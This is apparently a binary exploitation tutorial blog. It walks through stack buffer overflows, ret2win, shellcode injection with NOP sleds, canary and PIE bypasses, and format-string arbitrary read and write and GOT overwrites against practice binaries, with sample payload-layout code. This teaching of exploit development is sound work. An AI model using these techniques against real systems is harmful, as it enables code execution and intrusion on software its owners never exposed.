The better way to calculate offsets
A De Bruijn sequence of order n is simply a sequence in which no string of n characters is repeated. This makes finding the offset until EIP much simpler - we can just pass in a De Bruijn sequence, get the value within EIP and find the one possible match within the sequence to calculate the offset. Let's do this on the ret2win binary.
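To make the idea concrete, here is a minimal Python sketch of generating such a pattern and looking up an offset. The helper names (de_bruijn, find_offset), the alphabet and the simulated crash at offset 52 are illustrative assumptions; the pattern will not match the one ragg2 produces, so treat this as a model of the technique rather than a replacement for the tools.

```python
import struct

def de_bruijn(alphabet: bytes, n: int) -> bytes:
    """Return a De Bruijn sequence of order n over the given alphabet."""
    k = len(alphabet)
    a = [0] * (k * n)
    sequence = []

    def db(t: int, p: int) -> None:
        if t > n:
            if n % p == 0:
                sequence.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(alphabet[i] for i in sequence)

def find_offset(pattern: bytes, eip: int) -> int:
    """Find where the 4 bytes that ended up in EIP sit inside the pattern."""
    needle = struct.pack("<I", eip)  # EIP holds the bytes in little-endian order
    return pattern.find(needle)

# 100 bytes of pattern, every 4-byte window unique
pattern = de_bruijn(b"abcdefgh", 4)[:100]

# Simulate a crash: pretend the saved return pointer sat 52 bytes into our input
crash_value = struct.unpack("<I", pattern[52:56])[0]
offset = find_offset(pattern, crash_value)
print(offset)
```

Because each 4-byte window appears only once, the value found in EIP maps back to exactly one position in the input.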
Again, radare2 comes with a nice command-line tool (called ragg2) that can generate it for us. Let's create a sequence of length 100.
The -P specifies the length while -r tells it to show ascii bytes rather than hex pairs.
Now we have the pattern, let's just input it in radare2 when prompted for input, make it crash and then calculate how far along the sequence the EIP is. Simples.
The address it crashes on is 0x41534141; we can use radare2's in-built wopO command to work out the offset.
Awesome - we get the correct value!
We can also be lazy and not copy the value.
The backticks mean that dr eip is evaluated first, before wopO is run on its result.
Running your own code
In real exploits, it's not particularly likely that you will have a win() function lying around - shellcode is a way to run your own instructions, giving you the ability to run arbitrary commands on the system.
Shellcode is essentially assembly instructions, except we input them into the binary; once we input it, we overwrite the return pointer to hijack code execution and point at our own instructions!
I promise you can trust me but you should never ever run shellcode without knowing what it does. Pwntools is safe and has almost all the shellcode you will ever need.
The reason shellcode is successful is that Von Neumann architecture (the architecture used in most computers today) does not differentiate between data and instructions - it doesn't matter where or what you tell it to run, it will attempt to run it. Therefore, even though our input is data, the computer doesn't know that - and we can use that to our advantage.
ASLR is a security technique, and while it is not specifically designed to combat shellcode, it involves randomising certain aspects of memory (we will talk about it in much more detail later). This randomisation can make shellcode exploits like the one we're about to do less reliable, so we'll be disabling it for now using this.
Again, you should never run commands if you don't know what they do
Let's debug vuln() using radare2 and work out where in memory the buffer starts; this is where we want to point the return pointer to.
This value that gets printed out is a local variable - due to its size, it's fairly likely to be the buffer. Let's set a breakpoint just after gets() and find the exact address.
It appears to be at 0xffffcfd4; if we run the binary multiple times, it should remain where it is (if it doesn't, make sure ASLR is disabled!).
Now we need to calculate the padding until the return pointer. We'll use the De Bruijn sequence as explained in the previous blog post.
The padding is 312 bytes.
In order for the shellcode to be correct, we're going to set context.binary to our binary; this grabs stuff like the arch, OS and bits and enables pwntools to provide us with working shellcode.
We can use just process() because once context.binary is set it is assumed to use that process.
Now we can use pwntools' awesome shellcode functionality to make it incredibly simple.
Yup, that's it. Now let's send it off and use p.interactive(), which enables us to communicate with the shell.
If you're getting an EOFError, print out the shellcode and try to find it in memory - the stack address may be wrong.
And it works! Awesome.
We injected shellcode, a series of assembly instructions, when prompted for input
We then hijacked code execution by overwriting the saved return pointer on the stack and modified it to point to our shellcode
Once the return pointer got popped into EIP, it pointed at our shellcode
This caused the program to execute our instructions, giving us (in this case) a shell for arbitrary command execution
The most basic binexp challenge
A ret2win is simply a binary where there is a win() function (or equivalent); once you successfully redirect execution there, you complete the challenge.
To carry this out, we have to leverage what we learnt in the introduction, but in a predictable manner - we have to overwrite EIP, but to a specific value of our choice.
To do this, what do we need to know? Well, a couple things:
The padding until we begin to overwrite the return pointer (EIP)
What value we want to overwrite EIP to
When I say "overwrite EIP", I mean overwrite the saved return pointer that gets popped into EIP. The EIP register is not located on the stack, so it is not overwritten directly.
This can be found using simple trial and error; if we send a variable number of characters, we can use the Segmentation Fault message, in combination with radare2, to tell when we overwrote EIP. There is a better way to do it than simple brute force (we'll cover this in the next post), but it'll do for now.
You may get a segmentation fault for reasons other than overwriting EIP; use a debugger to make sure the padding is correct.
We get an offset of 52 bytes.
Now we need to find the address of the flag() function in the binary. This is simple.
afl stands for Analyse Functions List
The flag() function is at 0x080491c3.
The final piece of the puzzle is to work out how we can send the address we want. If you think back to the introduction, the As that we sent became 0x41 - which is the ASCII code of A. So the solution is simple - let's just find the characters with ascii codes 0x08, 0x04, 0x91 and 0xc3.
This is a lot simpler than you might think, because we can specify them in python as hex:
And that makes it much easier.
Now we know the padding and the value, let's exploit the binary! We can use pwntools to interface with the binary (check out the pwntools posts for a more in-depth look).
If you run this, there is one small problem: it won't work. Why? Let's check with a debugger. We'll put in a pause() to give us time to attach radare2 onto the process.
Now let's run the script with python3 exploit.py and then open up a new terminal window.
By providing the PID of the process, radare2 hooks onto it. Let's break at the return of unsafe() and read the value of the return pointer.
0xc3910408 - look familiar? It's the address we were trying to send over, except the bytes have been reversed, and the reason for this reversal is endianness. Big-endian systems store the most significant byte (the byte with the largest value) at the smallest memory address, and this is how we sent them. Little-endian does the opposite (for a reason), and most binaries you will come across are little-endian. As far as we're concerned, the bytes are stored in reverse order in little-endian executables.
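The reversal can be reproduced without the binary at all. The sketch below uses Python's standard struct module (an assumption of convenience, not what the exploit script uses) to pack the flag() address both ways and then read each result back the way a little-endian CPU would.

```python
import struct

flag_addr = 0x080491c3  # address of flag() reported by afl

big = struct.pack(">I", flag_addr)     # most significant byte first
little = struct.pack("<I", flag_addr)  # least significant byte first

print(big.hex())     # 080491c3
print(little.hex())  # c3910408

# A little-endian machine interprets whatever 4 bytes it finds like this
read_back_big = struct.unpack("<I", big)[0]
read_back_little = struct.unpack("<I", little)[0]

print(hex(read_back_big))     # 0xc3910408, the wrong value seen in the debugger
print(hex(read_back_little))  # 0x80491c3, the address we actually wanted
```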
radare2 comes with a nice tool called rabin2 for binary analysis:
So our binary is little-endian.
The fix is simple - reverse the address (you can also remove the pause())
If you run this now, it will work:
And wham, you've called the flag() function! Congrats!
Unsurprisingly, you're not the first person to have thought "could they possibly make endianness simpler" - luckily, pwntools has a built-in p32() function ready for use!
becomes
Much simpler, right?
The only caveat is that it returns bytes rather than a string, so you have to make the padding a byte string:
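A minimal sketch of the difference, using struct.pack from the standard library as a stand-in for p32() (for a 32-bit little-endian value it yields the same four bytes). The 52-byte padding and the address are the values found earlier; the variable names are illustrative.

```python
import struct

address = struct.pack("<I", 0x080491c3)  # stand-in for p32(0x080491c3)

# bytes + bytes is fine
payload = b"A" * 52 + address

# str + bytes is not: Python 3 refuses to mix the two types
try:
    "A" * 52 + address
    mixed_ok = True
except TypeError:
    mixed_ok = False

print(len(payload), mixed_ok)
```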
Otherwise you will get a
The defence against shellcode
As you can expect, programmers were hardly pleased that people could inject their own instructions into the program. The NX bit, which stands for No eXecute, defines areas of memory as either instructions or data. This means that your input will be stored as data, and any attempt to run it as instructions will crash the program, effectively neutralising shellcode.
To get around NX, exploit developers have to leverage a technique called ROP, Return-Oriented Programming.
The Windows version of NX is DEP, which stands for Data Execution Prevention
You can either use pwntools' checksec or rabin2.
The differences between the sizes
Everything we have done so far is applicable to 64-bit as well as 32-bit; the only thing you would need to change is to switch out the p32() for p64(), as the memory addresses are longer.
The real difference between the two, however, is the way you pass parameters to functions (which we'll be looking at much closer soon); in 32-bit, all parameters are pushed to the stack before the function is called. In 64-bit, however, the first 6 are stored in the registers RDI, RSI, RDX, RCX, R8 and R9 respectively as per the calling convention (System V AMD64 on Linux). Note that different Operating Systems also have different calling conventions.
More reliable shellcode exploits
NOP (no operation) instructions do exactly what they sound like: nothing. This makes them very useful for shellcode exploits, because all they will do is run the next instruction. If we pad our exploits on the left with NOPs and point EIP at the middle of them, it'll simply keep executing NOPs until it reaches our actual shellcode. This allows us a greater margin of error, as a shift of a few bytes forwards or backwards won't really affect it; it'll just run a different number of NOP instructions, with the same end result of running the shellcode. This padding with NOPs is often called a NOP slide or NOP sled, since the EIP is essentially sliding down them.
In Intel x86 assembly, NOP instructions are \x90.
The NOP instruction actually used to stand for XCHG EAX, EAX, which does effectively nothing.
We can make slight changes to our exploit to do two things:
Add a large number of NOPs on the left
Adjust our return pointer to point at the middle of the NOPs rather than the buffer start
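The two changes can be sketched as follows, using only the standard library. The buffer address and the 312-byte padding are the values found earlier; the sled length of 240 is an assumed choice, and the shellcode here is a placeholder of int3 bytes standing in for real shellcode such as the output of asm(shellcraft.sh()).

```python
import struct

BUFFER_START = 0xffffcfd4  # buffer address found earlier (ASLR disabled)
PADDING = 312              # offset to the saved return pointer
SLED_LEN = 240             # assumed sled size; must leave room for the shellcode

# Placeholder only: stands in for real shellcode bytes
shellcode = b"\xcc" * 44

payload = b"\x90" * SLED_LEN            # 1. NOPs on the left
payload += shellcode
payload = payload.ljust(PADDING, b"A")  # pad up to the return pointer

# 2. aim at the middle of the sled rather than the buffer start
target = BUFFER_START + SLED_LEN // 2
payload += struct.pack("<I", target)

print(hex(target), len(payload))
```

Aiming at the middle means the stack can shift by up to 120 bytes in either direction and execution still lands somewhere in the sled.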
Make sure ASLR is still disabled. If you have to disable it again, you may have to readjust your previous exploit as the buffer location may be different.
It's probably worth mentioning that shellcode with NOPs is not failsafe; if you receive unexpected errors padding with NOPs but the shellcode worked before, try reducing the length of the nopsled as it may be tampering with other things on the stack.
Note that NOPs are only \x90 in certain architectures, and if you need others you can use pwntools:
An introduction to binary exploitation
Binary Exploitation is about finding vulnerabilities in programs and utilising them to do what you wish. Sometimes this can result in an authentication bypass or the leaking of classified information, but occasionally (if you're lucky) it can also result in Remote Code Execution (RCE). The most basic forms of binary exploitation occur on the stack, a region of memory that stores temporary variables created by functions in code.
When a new function is called, a memory address in the calling function is pushed to the stack - this way, the program knows where to return to once the called function finishes execution. Let's look at a basic binary to show this.
The binary has two files - source.c and vuln; the latter is an ELF file, which is the executable format for Linux (it is recommended to follow along with this with a Virtual Machine of your own, preferably Linux).
We're gonna use a tool called radare2 to analyse the behaviour of the binary when functions are called.
The -d runs it while the -A performs analysis. We can disassemble main with
s main seeks (moves) to main, while pdf stands for Print Disassembly Function (literally just disassembles it).
The call to unsafe is at 0x080491bb, so let's break there.
db stands for debug breakpoint, and just sets a breakpoint. A breakpoint is simply somewhere which, when reached, pauses the program for you to run other commands. Now we run dc for debug continue; this just carries on running the file.
It should break before unsafe is called; let's analyse the top of the stack now:
pxw tells r2 to analyse the hex as words, that is, 32-bit values. I only show the first value here, which is 0xf7efe000. This value is stored at the top of the stack, as ESP points to the top of the stack - in this case, that is 0xff984af0.
Note that the value 0xf7efe000 is random - it's an artefact of previous processes that have used that part of the stack. The stack is never wiped, it's just marked as usable, so before data actually gets put there the value is completely dependent on your system.
Let's move one more instruction with ds, debug step, and check the stack again. This will execute the call sym.unsafe instruction.
Huh, something's been pushed onto the top of the stack - the value 0x080491c0. This looks like it's in the binary - but where? Let's look back at the disassembly from before:
We can see that 0x080491c0 is the memory address of the instruction after the call to unsafe. Why? This is how the program knows where to return to after unsafe() has finished.
But as we're interested in binary exploitation, let's see how we can possibly break this. First, let's disassemble unsafe and break on the ret instruction; ret is the equivalent of pop eip, which will get the saved return pointer we just analysed on the stack into the eip register. Then let's continue and spam a bunch of characters into the input and see how that could affect it.
Now let's read the value at the location the return pointer was at previously, which as we saw was 0xff984aec.
Huh?
It's quite simple - we inputted more data than the program expected, which resulted in us overwriting more of the stack than the developer expected. The saved return pointer is also on the stack, meaning we managed to overwrite it. As a result, on the ret, the value popped into eip won't be in the previous function but rather 0x41414141. Let's check with ds.
And look at the new prompt - 0x41414141. Let's run dr eip to make sure that's the value in eip:
Yup, it is! We've successfully hijacked the program execution! Let's see if it crashes when we let it run with dc.
radare2 is very useful and prints out the address that causes it to crash. If you cause the program to crash outside of a debugger, it will usually say Segmentation Fault, which could mean a variety of things, but usually that you have overwritten EIP.
Of course, you can prevent people from writing more characters than expected when making your program, usually using other C functions such as fgets(); gets() is intrinsically unsafe because it doesn't check the length of the input, meaning that the presence of gets() is always something you should check out in a program. It is also possible to give fgets() the wrong parameters, meaning it still takes in too many characters.
When a function calls another function, it
pushes a return pointer to the stack so the called function knows where to return
when the called function finishes execution, it pops it off the stack again
Because this value is saved on the stack, just like our local variables, if we write more characters than the program expects, we can overwrite the value and redirect code execution to wherever we wish. Functions such as fgets() can prevent such easy overflow, but you should check how much is actually being read.
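The summary above can be modelled in a few lines of Python. This is a toy, not how a real process works: the frame layout (a 16-byte buffer, then a saved EBP, then the saved return pointer), the saved EBP value and all function names are assumptions made for illustration. Only the return address 0x080491c0 comes from the walkthrough.

```python
import struct

BUF_SIZE = 16

def make_frame(return_addr: int) -> bytearray:
    """Toy frame: [ buffer | saved EBP | saved return pointer ]."""
    return bytearray(b"\x00" * BUF_SIZE + struct.pack("<II", 0xff984b08, return_addr))

def unsafe_copy(frame: bytearray, data: bytes) -> None:
    """Like gets(): copies everything and never checks BUF_SIZE."""
    frame[0:len(data)] = data

def bounded_copy(frame: bytearray, data: bytes, limit: int) -> None:
    """Like fgets(buf, limit, ...): copies at most limit - 1 bytes."""
    data = data[:limit - 1]
    frame[0:len(data)] = data

def saved_return(frame: bytearray) -> int:
    return struct.unpack_from("<I", frame, BUF_SIZE + 4)[0]

user_input = b"A" * 24

smashed = make_frame(0x080491c0)
unsafe_copy(smashed, user_input)

safe = make_frame(0x080491c0)
bounded_copy(safe, user_input, BUF_SIZE)

wrong_limit = make_frame(0x080491c0)
bounded_copy(wrong_limit, user_input, 100)  # limit larger than the buffer

print(hex(saved_return(smashed)))      # 0x41414141
print(hex(saved_return(safe)))         # 0x80491c0
print(hex(saved_return(wrong_limit)))  # 0x41414141
```

The last case is the "wrong parameters" situation: a bounded read only helps if the bound matches the buffer.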
Welcome to my blog! There's a lot here and it's a bit spread out, so here's a guide:
If you're looking for the binary exploitation notes, you're in the right place! Here I make notes on most of the things I learn, and also provide vulnerable binaries to allow you to have a go yourself. Most "common" stack techniques are mentioned along with some super introductory heap; more will come soon™.
If you're looking for my maths notes, they are split up (with some overlap):
Cryptography-specific maths can be found on GitBook, or by clicking the hyperlink in the header
All my other maths notes can be found on Notion. I realise having it in multiple locations is annoying, but maths support in Notion is just wayyy better. Like so much better. Sorry.
Hopefully these two get moulded into one soon
If you'd like to find me elsewhere, I'm usually down as ir0nstone. The accounts you'd actually be interested in seeing are likely or my (or X, if you really prefer).
If this resource has been helpful to you, please consider :)
And, of course, thanks to GitBook for all of their support :)
~ Andrej Ljubic
A minor issue
A small issue you may get when pwning on 64-bit systems is that your exploit works perfectly locally but fails remotely - or even fails when you try to use the provided LIBC version rather than your local one. This arises due to something called stack alignment.
Essentially the x86-64 ABI (application binary interface) guarantees 16-byte alignment on a call instruction. LIBC takes advantage of this and uses SSE data transfer instructions to optimise execution; system in particular utilises instructions such as movaps.
That means that if the stack is not 16-byte aligned - that is, RSP is not a multiple of 16 - the ROP chain will fail on system.
The fix is simple - in your ROP chain, before the call to system, place a singular ret gadget:
This works because it will cause RSP to be popped an additional time, pushing it forward by 8 bytes and aligning it.
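As a rough sketch of what that looks like in a payload, the chain below is built with the standard library only. Every address is hypothetical and would have to be found in the real binary and libc, and pack64 is a local helper standing in for p64().

```python
import struct

# Hypothetical addresses, for illustration only
POP_RDI = 0x4011cb  # pop rdi; ret gadget
RET = 0x40101a      # lone ret gadget
BINSH = 0x404060    # address of a "/bin/sh" string
SYSTEM = 0x401040   # address of system

def pack64(value: int) -> bytes:
    """Stand-in for p64(): 8 bytes, little-endian."""
    return struct.pack("<Q", value)

# Chain that may crash inside system on a movaps instruction
chain = pack64(POP_RDI) + pack64(BINSH) + pack64(SYSTEM)

# Same chain with one extra ret, which consumes one more 8-byte slot
aligned_chain = pack64(POP_RDI) + pack64(BINSH) + pack64(RET) + pack64(SYSTEM)

shift = len(aligned_chain) - len(chain)
print(shift)  # 8
```

Since RSP only ever moves in 8-byte steps here, a misaligned stack is always exactly 8 bytes off, which is why a single extra ret is enough.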
As shown in the pwntools ELF tutorial, pwntools has a host of functionality that allows you to really make your exploit dynamic. Simply setting elf.address will automatically update all the function and symbol addresses for you, meaning you don't have to worry about using readelf or other command line tools, but instead can receive it all dynamically.
Not to mention that the ROP capabilities are incredibly powerful as well.
Position Independent Code
PIE stands for Position Independent Executable, which means that every time you run the file it gets loaded into a different memory address. This means you cannot hardcode values such as function addresses and gadget locations without finding out where they are.
Luckily, this does not mean it's impossible to exploit. PIE executables are based around relative rather than absolute addresses, meaning that while the locations in memory are fairly random the offsets between different parts of the binary remain constant. For example, if you know that the function main is located 0x128 bytes in memory after the base address of the binary, and you somehow find the location of main, you can simply subtract 0x128 from this to get the base address, and from that the addresses of everything else.
So, all we need to do is find a single address and PIE is bypassed. Where could we leak this address from?
The stack of course!
We know that the return pointer is located on the stack - and much like a canary, we can use format string (or other ways) to read the value off the stack. The value will always be a static offset away from the binary base, enabling us to completely bypass PIE!
Due to the way PIE randomisation works, the base address of a PIE executable will always end in the hexadecimal characters 000. This is because pages are the things being randomised in memory, which have a standard size of 0x1000. Operating Systems keep track of page tables which point to each section of memory and define the permissions for each section, similar to segmentation.
Checking the base address ends in 000 should probably be the first thing you do if your exploit is not working as you expected.
The Buffer Overflow defence
Stack Canaries are very simple - at the beginning of the function, a random value is placed on the stack. Before the program executes ret, the current value of that variable is compared to the initial: if they are the same, no buffer overflow has occurred.
If they are not, the attacker attempted to overflow to control the return pointer and the program crashes, often with a ***stack smashing detected*** error message.
On Linux, stack canaries end in 00. This is so that they null-terminate any strings in case you make a mistake when using print functions, but it also makes them much easier to spot.
There are two ways to bypass a canary.
This is quite broad and will differ from binary to binary, but the main aim is to read the value. The simplest option is using format string if it is present - the canary, like other local variables, is on the stack, so if we can leak values off the stack it's easy.
The source is very simple - it gives you a format string vulnerability, then a buffer overflow vulnerability. The format string we can use to leak the canary value, then we can use that value to overwrite the canary with itself. This way, we can overflow past the canary but not trigger the check as its value remains constant. And of course, we just have to run win().
First let's check there is a canary:
Yup, there is. Now we need to calculate at what offset the canary is at, and to do this we'll use radare2.
The last value there is the canary. We can tell because it's roughly 64 bytes after the "buffer start", which should be close to the end of the buffer. Additionally, it ends in 00 and looks very random, unlike the libc and stack addresses that start with f7 and ff. If we count the number of addresses it's around 24 until that value, so we go one before and one after as well to make sure.
It appears to be at %23$p. Remember, stack canaries are randomised for each new process, so it won't be the same.
Now let's just automate grabbing the canary with pwntools:
Now all that's left is work out what the offset is until the canary, and then the offset from after the canary to the return pointer.
We see the canary is at 0xffea8afc. A little later on the return pointer (we assume) is at 0xffea8b0c. Let's break just after the next gets() and check what value we overwrite it with (we'll use a De Bruijn pattern).
Now we can check the canary and EIP offsets:
Return pointer is 16 bytes after the canary start, so 12 bytes after the canary.
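Put together, the overflow has to keep the canary intact while still reaching the return pointer. The sketch below lays that out with the standard library. The 64-byte distance to the canary is an assumption based on the "roughly 64 bytes" estimate above, the 12-byte gap is the figure just calculated, and both the leaked canary string and the win() address are made-up example values.

```python
import struct

CANARY_OFFSET = 64  # assumed distance from buffer start to the canary
GAP_AFTER = 12      # bytes between the end of the canary and the return pointer

leak = b"0x1a2b3c00"          # hypothetical output of the %23$p leak
canary = int(leak.decode(), 16)
win_addr = 0x08049245         # hypothetical address of win()

payload = b"A" * CANARY_OFFSET
payload += struct.pack("<I", canary)    # overwrite the canary with itself
payload += b"A" * GAP_AFTER
payload += struct.pack("<I", win_addr)  # new saved return pointer

print(len(payload))
```

Note that the canary's 00 byte ends up first in memory, which is why input functions that stop at a null byte matter for this kind of payload.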
Same source, same approach, just 64-bit. Try it yourself before checking the solution.
Remember, in 64-bit format string goes to the relevant registers first and the addresses can fit 8 bytes each so the offset may be different.
This is possible on 32-bit, and sometimes unavoidable. It's not, however, feasible on 64-bit.
As you can expect, the general idea is to run the process loads and loads of times with random canary values until you get a hit, which you can differentiate by the presence of a known plaintext, e.g. flag{. This can take ages to run and is frankly not a particularly interesting challenge.
Reading memory off the stack
Format String is a dangerous bug that is easily exploitable. If manipulated correctly, you can leverage it to perform powerful actions such as reading from and writing to arbitrary memory locations.
In C, certain functions can take "format specifiers" within strings. Let's look at an example:
This prints out:
So, it replaced %d with the value, %f with the float value and %x with the hex representation.
This is a nice way in C of formatting strings (string concatenation is quite complicated in C). Let's try printing out the same value in hex 3 times:
As expected, we get
What happens, however, if we don't have enough arguments for all the format specifiers?
Erm... what happened here?
The key here is that printf expects as many parameters as format string specifiers, and in 32-bit it grabs these parameters from the stack. If there aren't enough parameters on the stack, it'll just grab the next values - essentially leaking values off the stack. And that's what makes it so dangerous.
Surely if it's a bug in the code, the attacker can't do much, right? Well the real issue is when C code takes user-provided input and prints it out using printf.
If we run this normally, it works as expected:
But what happens if we input format string specifiers, such as %x?
It reads values off the stack and returns them as the developer wasn't expecting so many format string specifiers.
To print the same value 3 times, using
Gets tedious - so, there is a better way in C.
The 1$ between tells printf to use the first parameter. However, this also means that attackers can read values an arbitrary offset from the top of the stack - say we know there is a canary at the 6th %p - instead of sending %p %p %p %p %p %p we can just do %6$p. This allows us to be much more efficient.
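To see why the positional form is equivalent, here is a toy model in Python. It is not printf: toy_printf, the regular expression and the stack contents are all invented for illustration, and it only understands %x, %p and their N$ variants. It simply treats a list as the stack words that printf would walk through.

```python
import re

SPEC = re.compile(r"%(?:(\d+)\$)?([xp])")

def toy_printf(fmt: str, stack: list) -> str:
    """Expand %x / %p (optionally N$) by reading 'stack' words in order."""
    next_arg = 0

    def expand(match):
        nonlocal next_arg
        position, kind = match.groups()
        if position is None:
            index = next_arg           # plain specifier: take the next word
            next_arg += 1
        else:
            index = int(position) - 1  # N$: jump straight to the Nth word
        value = stack[index]
        return f"{value:#x}" if kind == "p" else f"{value:x}"

    return SPEC.sub(expand, fmt)

# Hypothetical stack words; the 6th plays the role of the canary
stack = [0x40, 0xf7fa0580, 0x8049199, 0x0, 0x1, 0x5d3f2a00]

print(toy_printf("%p %p %p %p %p %p", stack))
print(toy_printf("%6$p", stack))
print(toy_printf("%1$x %1$x %1$x", stack))
```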
In C, when you want to use a string you use a pointer to the start of the string - this is essentially a value that represents a memory address. So when you use the %s format specifier, it's the pointer that gets passed to it. That means instead of reading a value off the stack, you read the value in the memory address it points at.
Now this is all very interesting - if you can find a value on the stack that happens to correspond to where you want to read, that is. But what if we could specify where we want to read? Well... we can.
Let's look back at the previous program and its output:
You may notice that the last two values contain the hex values of %x. That's because we're reading the buffer. Here it's at the 4th offset - if we can write an address then point %s at it, we can get an arbitrary read!
%p is a pointer; generally, it returns the same as %x, just preceded by a 0x which makes it stand out more
As we can see, we're reading the value we inputted. Let's write a quick pwntools script that writes the location of the ELF file and reads it with %s - if all goes well, it should read the first bytes of the file, which is always \x7fELF. Start with the basics:
Nice it works. The base address of the binary is 0x8048000, so let's replace the 0x41424344 with that and read it with %s:
It doesn't work.
The reason it doesn't work is that printf stops at null bytes, and the very first character is a null byte. We have to put the format specifier first.
Let's break down the payload:
We add 4 | because we want the address we write to fill one memory address, not half of one and half another, because that will result in reading the wrong address
The offset is %8$p because the start of the buffer is generally at %6$p. However, memory addresses are 4 bytes long each and we already have 8 bytes, so it's two memory addresses further along at %8$p.
It still stops at the null byte, but that's not important because we get the output; the address is still written to memory, just not printed back.
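The layout described in that breakdown can be sketched as below, again with struct.pack standing in for p32(). The variable names are illustrative; the format specifier, the | filler and the 0x8048000 target come from the text.

```python
import struct

target = 0x8048000  # base address of the binary, starts with a null byte when packed

fmt = b"%8$p"                    # specifier first, so the null byte comes after it
filler = b"|" * (8 - len(fmt))   # pad to 8 bytes so the address fills one whole slot
payload = fmt + filler + struct.pack("<I", target)

print(payload)
print(payload.index(b"\x00"))  # 8: the first null byte sits after everything printf needs
```

With the buffer starting at the 6th slot and 8 bytes of specifier and filler in front, the address lands in the 8th slot, matching the %8$p offset.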
Now let's replace the p with an s.
Of course, %s will also stop at a null byte as strings in C are terminated with them. We have worked out, however, that the first bytes of an ELF file up to a null byte are \x7fELF\x01\x01\x01.
Luckily C contains a rarely-used format specifier %n. This specifier takes in a pointer (memory address) and writes there the number of characters written so far. If we can control the input, we can control how many characters are written and also where we write them.
Obviously, there is a small flaw - to write, say, 0x8048000 to a memory address, we would have to write that many characters - and generally buffers aren't quite that big. Luckily there are other format string specifiers for that. I fully recommend you watch this video to completely understand it, but let's jump into a basic binary.
Simple - we need to overwrite the variable auth with the value 10. Format string vulnerability is obvious, but there's also no buffer overflow due to a secure fgets.
As it's a global variable, it's within the binary itself. We can check the location using readelf to check for symbols.
Location of auth is 0x0804c028.
We're lucky there's no null bytes, so there's no need to change the order.
Buffer is the 7th %p.
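One way such a payload could be laid out is sketched below, with the standard library only. The address of auth, the target value 10 and the offset 7 come from the steps above; using | as filler and the variable names are assumptions. The idea is that the 4 address bytes plus 6 filler characters make 10 characters printed before %n is reached.

```python
import struct

AUTH = 0x0804c028  # location of auth
WANTED = 10        # value we want %n to write
OFFSET = 7         # the buffer is the 7th %p

payload = struct.pack("<I", AUTH)             # 4 bytes, lands in the 7th slot
payload += b"|" * (WANTED - len(payload))     # 6 filler characters
written_before_n = len(payload)               # characters printed so far
payload += f"%{OFFSET}$n".encode()            # write that count to the 7th slot's address

print(payload, written_before_n)
```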
And easy peasy:
As you can expect, pwntools has a handy feature for automating %n format string exploits:
The offset in this case is 7 because the 7th %p read the buffer; the location is where you want to write it and the value is what. Note that you can add as many location-value pairs into the dictionary as you want.
You can also grab the location of the auth symbol with pwntools:
Check out the pwntools tutorials for more cool features
Utilising Calling Conventions
The program expects the stack to be laid out like this before executing the function:
So why don't we provide it like that? As well as the function, we also pass the return address and the parameters.
Everything after the address of flag() will be part of the stack frame for the next function as it is expected to be there - just instead of using push instructions we just overwrote them manually.
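As a sketch of that layout for the 32-bit case, the payload below places a return address and two parameters directly after the address of flag(). Every value is hypothetical (the padding, the flag() address, the fake return address and both arguments), and pack32 is a local stand-in for p32().

```python
import struct

def pack32(value: int) -> bytes:
    """Stand-in for p32(): 4 bytes, little-endian."""
    return struct.pack("<I", value)

# All values below are hypothetical and depend on the actual binary
PADDING = 52
FLAG = 0x080491c3          # function to call
RETURN_AFTER = 0x0         # where flag() would return to; unused here
ARG1 = 0xdeadc0de
ARG2 = 0xc0ded00d

payload = b"A" * PADDING
payload += pack32(FLAG)          # overwrites the saved return pointer
payload += pack32(RETURN_AFTER)  # what flag() sees as its own return address
payload += pack32(ARG1)          # first parameter
payload += pack32(ARG2)          # second parameter

print(len(payload))
```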
Same logic, except we have to utilise the gadgets we talked about previously to fill the required registers (in this case rdi and rsi as we have two parameters).
We have to fill the registers before the function is called
Using format string
Unlike last time, we don't get given a function. We'll have to leak it with format strings.
Everything's as we expect.
As last time, first we set everything up.
Now we just need a leak. Let's try a few offsets.
3rd one looks like a binary address, let's check the difference between the 3rd leak and the base address in radare2. Set a breakpoint somewhere after the format string leak (doesn't really matter where).
We can see the base address is 0x565ef000 and the leaked value is 0x565f01d5. Therefore, subtracting 0x11d5 from the leaked address should give us the base address of the binary. Let's leak the value and get the base address.
Now we just need to send the exploit payload.
Same deal, just 64-bit. Try it out :)
Address Space Layout Randomisation
ASLR stands for Address Space Layout Randomisation and can, in most cases, be thought of as libc's equivalent of PIE - every time you run a binary, libc (and other libraries) get loaded into a different memory address.
While it's tempting to think of ASLR as libc PIE, there is a key difference.
ASLR is a kernel protection while PIE is a binary protection. The main difference is that PIE can be compiled into the binary while the presence of ASLR is completely dependent on the environment running the binary. If I sent you a binary compiled with ASLR disabled while I did it, it wouldn't make any difference at all if you had ASLR enabled.
Of course, as with PIE, this means you cannot hardcode values such as function addresses (e.g. system for a ret2libc).
It's tempting to think that, as with PIE, we can simply format string for a libc address and subtract a static offset from it. Sadly, we can't quite do that.
When functions finish execution, they do not get removed from memory; instead, they just get ignored and overwritten. Chances are very high that you will grab one of these remnants with the format string. Different libc versions can act very differently during execution, so a value you just grabbed may not even exist remotely, and if it does the offset will most likely be different (different libcs have different sizes and therefore different offsets between functions). It's possible to get lucky, but you shouldn't really hope that the offsets remain the same.
Instead, a more reliable way is reading the .
For the same reason as PIE, libc base addresses always end in the hexadecimal characters 000
.
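A small sketch of how that property is typically used as a sanity check. The symbol offset and leaked address here are hypothetical; real values depend on the libc version in use.

```python
PAGE_MASK = 0xfff  # libc is mapped on a page boundary, so these bits are zero


def libc_base(leaked_addr: int, symbol_offset: int) -> int:
    """Subtract a symbol's offset from its leaked address to get libc base."""
    base = leaked_addr - symbol_offset
    if base & PAGE_MASK:
        # Usually means the wrong libc version (and so the wrong offset).
        raise ValueError(f"suspicious libc base {base:#x}")
    return base


PUTS_OFFSET = 0x67460        # hypothetical offset of puts inside libc
leaked_puts = 0xf7e1b460     # hypothetical leaked runtime address of puts

base = libc_base(leaked_puts, PUTS_OFFSET)
print(hex(base))
```

If the check fails against a remote target, the most likely cause is that the remote libc differs from the local one.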
Hijacking functions
You may remember that the GOT stores the actual locations in libc
of functions. Well, if we could overwrite an entry, we could gain code execution that way. Imagine the following code:
Not only is there a buffer overflow and format string vulnerability here, but say we used that format string to overwrite the GOT entry of printf
with the location of system
. The code would essentially look like the following:
Bit of an issue? Yes. Our input is being passed directly to system
.
Bypassing ASLR
